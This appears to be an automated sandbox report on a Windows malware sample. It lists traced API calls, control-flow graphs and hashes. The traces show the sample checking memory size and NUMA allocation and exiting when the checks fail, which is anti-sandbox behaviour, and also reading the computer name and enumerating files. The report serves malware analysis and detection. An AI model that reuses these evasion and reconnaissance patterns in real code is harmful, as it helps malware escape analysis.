                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00301046
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 0030104D
                                  • ExitProcess.KERNEL32 ref: 00301058
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0030106C
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003010AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                  • String ID:
                                  • API String ID: 3477276466-0
                                  • Opcode ID: fb3e30018bb748e9cc3b5ca1374d0be3fef68c8906abb88448ab92387a972972
                                  • Instruction ID: 5fda74897736674e12a23fda76fbface699bdde1e4567edbbe82d2d3416bf55a
                                  • Opcode Fuzzy Hash: fb3e30018bb748e9cc3b5ca1374d0be3fef68c8906abb88448ab92387a972972
                                  • Instruction Fuzzy Hash: 4E01F4B57413047BE7244A656C6EF6B77ADA794B05F208014F744E73C0D9B1EA049664
                                  Function 0031EE90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2805 31ee90-31eeb5 call 302930 2808 31eeb7-31eebf 2805->2808 2809 31eec9-31eecd call 306c40 2805->2809 2808->2809 2811 31eec1-31eec3 lstrcpy 2808->2811 2812 31eed2-31eee8 StrCmpCA 2809->2812 2811->2809 2813 31ef11-31ef18 call 302a20 2812->2813 2814 31eeea-31ef02 call 302a20 call 302930 2812->2814 2820 31ef20-31ef28 2813->2820 2823 31ef45-31efa0 call 302a20 * 10 2814->2823 2824 31ef04-31ef0c 2814->2824 2820->2820 2822 31ef2a-31ef37 call 302930 2820->2822 2822->2823 2829 31ef39 2822->2829 2824->2823 2827 31ef0e-31ef0f 2824->2827 2831 31ef3e-31ef3f lstrcpy 2827->2831 2829->2831 2831->2823
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031EEC3
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0031EEDE
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 0031EF3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: ERROR
                                  • API String ID: 3722407311-2861137601
                                  • Opcode ID: f22ddeca0843ba06d9d2181f476501ed80faae4b0617e016acf0da9b1a7e2f99
                                  • Instruction ID: 86b79cff1e19f98a7dc1675ff874e7e64d87c58d0ed4b731c914828cdec0c5b5
                                  • Opcode Fuzzy Hash: f22ddeca0843ba06d9d2181f476501ed80faae4b0617e016acf0da9b1a7e2f99
                                  • Instruction Fuzzy Hash: D9210E717212069BCB27FF78DC5AA9B37A4AF14300F055428BC4ADF292DF31E8658B90
                                  Function 003010C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2886 3010c0-3010cb 2887 3010d0-3010dc 2886->2887 2889 3010de-3010f3 GlobalMemoryStatusEx 2887->2889 2890 301112-301114 ExitProcess 2889->2890 2891 3010f5-301106 2889->2891 2892 301108 2891->2892 2893 30111a-30111d 2891->2893 2892->2890 2894 30110a-301110 2892->2894 2894->2890 2894->2893
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 94e7d241528325c7e41489d36e621dabda7999413dfc5bd62789dcba799cfeaa
                                  • Instruction ID: eae0ee3c2e76418a08834ddffb6bad537fc94f3039e75d583f35b09af430232e
                                  • Opcode Fuzzy Hash: 94e7d241528325c7e41489d36e621dabda7999413dfc5bd62789dcba799cfeaa
                                  • Instruction Fuzzy Hash: 86F0ECB011A2455BEB5D6A68DC6A72DF7D8EB11350F104929EEDBC32D1E670C8409167
                                  Function 00318C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2895 318c88-318cc4 StrCmpCA 2897 318cc6-318cc7 ExitProcess 2895->2897 2898 318ccd-318ce6 2895->2898 2900 318ee2-318eef call 302a20 2898->2900 2901 318cec-318cf1 2898->2901 2903 318cf6-318cf9 2901->2903 2904 318ec3-318edc 2903->2904 2905 318cff 2903->2905 2904->2900 2945 318cf3 2904->2945 2907 318d30-318d3f lstrlen 2905->2907 2908 318e56-318e64 StrCmpCA 2905->2908 2909 318d5a-318d69 lstrlen 2905->2909 2910 318dbd-318dcb StrCmpCA 2905->2910 2911 318ddd-318deb StrCmpCA 2905->2911 2912 318dfd-318e0b StrCmpCA 2905->2912 2913 318e1d-318e2b StrCmpCA 2905->2913 2914 318e3d-318e4b StrCmpCA 2905->2914 2915 318d84-318d92 StrCmpCA 2905->2915 2916 318da4-318db8 StrCmpCA 2905->2916 2917 318d06-318d15 lstrlen 2905->2917 2918 318e88-318e9a lstrlen 2905->2918 2919 318e6f-318e7d StrCmpCA 2905->2919 2928 318d41-318d46 call 302a20 2907->2928 2929 318d49-318d55 call 302930 2907->2929 2908->2904 2924 318e66-318e6d 2908->2924 2930 318d73-318d7f call 302930 2909->2930 2931 318d6b-318d70 call 302a20 2909->2931 2910->2904 2934 318dd1-318dd8 2910->2934 2911->2904 2935 318df1-318df8 2911->2935 2912->2904 2936 318e11-318e18 2912->2936 2913->2904 2920 318e31-318e38 2913->2920 2914->2904 2921 318e4d-318e54 2914->2921 2915->2904 2933 318d98-318d9f 2915->2933 2916->2904 2922 318d17-318d1c call 302a20 2917->2922 2923 318d1f-318d2b call 302930 2917->2923 2926 318ea4-318eb0 call 302930 2918->2926 2927 318e9c-318ea1 call 302a20 2918->2927 2919->2904 2925 318e7f-318e86 2919->2925 2920->2904 2921->2904 2922->2923 2954 318eb3-318eb5 2923->2954 2924->2904 2925->2904 2926->2954 2927->2926 2928->2929 2929->2954 2930->2954 2931->2930 2933->2904 2934->2904 2935->2904 2936->2904 2945->2903 2954->2904 2955 318eb7-318eb9 2954->2955 2955->2904 2956 318ebb-318ebd lstrcpy 2955->2956 2956->2904
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: eade11d6097ed0792b45e90cb87a165efacbf09c31134b60d1e5328e05f39f5f
                                  • Instruction ID: 7f041f22e7bff74c03e0a1026d27338778424beb578155f6421c3a126dccea9f
                                  • Opcode Fuzzy Hash: eade11d6097ed0792b45e90cb87a165efacbf09c31134b60d1e5328e05f39f5f
                                  • Instruction Fuzzy Hash: 73E0D875405355FFCB159BB9CC58882BFB8EF1A304B4508DDE9006F660D671BC05D7A9
                                  Function 00322AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2957 322ad0-322b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 322b44-322b59 2957->2958 2959 322b24-322b36 2957->2959
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00322AFF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00322B06
                                  • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00322B1A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: a02edf615d3c2476878be8b36bd9ff650e28d0f85bc43621160cd1a48ff8ef82
                                  • Instruction ID: be6a171efa346d155eb89e3543cb3c04f5fc416a799b535a1e174e24a4d3d667
                                  • Opcode Fuzzy Hash: a02edf615d3c2476878be8b36bd9ff650e28d0f85bc43621160cd1a48ff8ef82
                                  • Instruction Fuzzy Hash: 8E01D6B6A44618ABC710CF99ED89B9EF7B8F744B21F00026AF915D3780D7741904C7A1
                                  Function 0030100E Relevance: 4.5, APIs: 3, Instructions: 32memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00301046
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 0030104D
                                  • ExitProcess.KERNEL32 ref: 00301058
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0030106C
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003010AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                  • String ID:
                                  • API String ID: 3477276466-0
                                  • Opcode ID: a17b3778a4b80a999fd54253a833e187e6425887a79b134afc6da7bffcd691ad
                                  • Instruction ID: 491bba596b1646d127546a9be0645d5b175bb7c7b63be417bc83a0238132145c
                                  • Opcode Fuzzy Hash: a17b3778a4b80a999fd54253a833e187e6425887a79b134afc6da7bffcd691ad
                                  • Instruction Fuzzy Hash: A2E08CB42483807EEA2203B15C1EF133F6C9F13B01F040481F280AA1D2C5D0A404A664

                                  Non-executed Functions

                                  Function 00312390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003123D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003123F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00312402
                                  • lstrlen.KERNEL32(\*.*), ref: 0031240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00312436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00312486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: 527d99896a89b8c5bbae0d7735c8f13b5b3096709ffe8d2d8543e28be1ba7e0b
                                  • Instruction ID: bfa9a3f5590b491cf8920e0f4bc17e5c5301437f201e99fa5c3711706344ba9a
                                  • Opcode Fuzzy Hash: 527d99896a89b8c5bbae0d7735c8f13b5b3096709ffe8d2d8543e28be1ba7e0b
                                  • Instruction Fuzzy Hash: 73A27E71A116169BCB27AFB8DC9CAEF77B9AF18300F054028F805A7291DF74DD598B90
                                  Function 003016A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003016E2
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00301719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030176C
                                  • lstrcat.KERNEL32(00000000), ref: 00301776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003017A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003017EF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003017F9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301825
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301875
                                  • lstrcat.KERNEL32(00000000), ref: 0030187F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003018AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003018F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003018FE
                                  • lstrlen.KERNEL32(00331794), ref: 00301909
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301929
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301935
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030195B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301966
                                  • lstrlen.KERNEL32(\*.*), ref: 00301971
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030198E
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 0030199A
                                    • Part of subcall function 00324040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0032406D
                                    • Part of subcall function 00324040: lstrcpy.KERNEL32(00000000,?), ref: 003240A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003019C3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301A0E
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301A16
                                  • lstrlen.KERNEL32(00331794), ref: 00301A21
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301A41
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301A4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301A76
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301A81
                                  • lstrlen.KERNEL32(00331794), ref: 00301A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301AAC
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301AB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301ADE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301AE9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301B11
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00301B45
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 00301B70
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 00301B8A
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00301BC4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301BFB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301C03
                                  • lstrlen.KERNEL32(00331794), ref: 00301C0E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301C31
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301C3D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301C69
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301C74
                                  • lstrlen.KERNEL32(00331794), ref: 00301C7F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301CA2
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301CAE
                                  • lstrlen.KERNEL32(?), ref: 00301CBB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301CDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00301CE9
                                  • lstrlen.KERNEL32(00331794), ref: 00301CF4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301D14
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301D20
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301D46
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301D51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301D7D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301DE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301DEB
                                  • lstrlen.KERNEL32(00331794), ref: 00301DF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301E19
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301E25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301E4B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00301E56
                                  • lstrlen.KERNEL32(00331794), ref: 00301E61
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301E81
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00301E8D
                                  • lstrlen.KERNEL32(?), ref: 00301E9A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301EBA
                                  • lstrcat.KERNEL32(00000000,?), ref: 00301EC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301EF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00301F3E
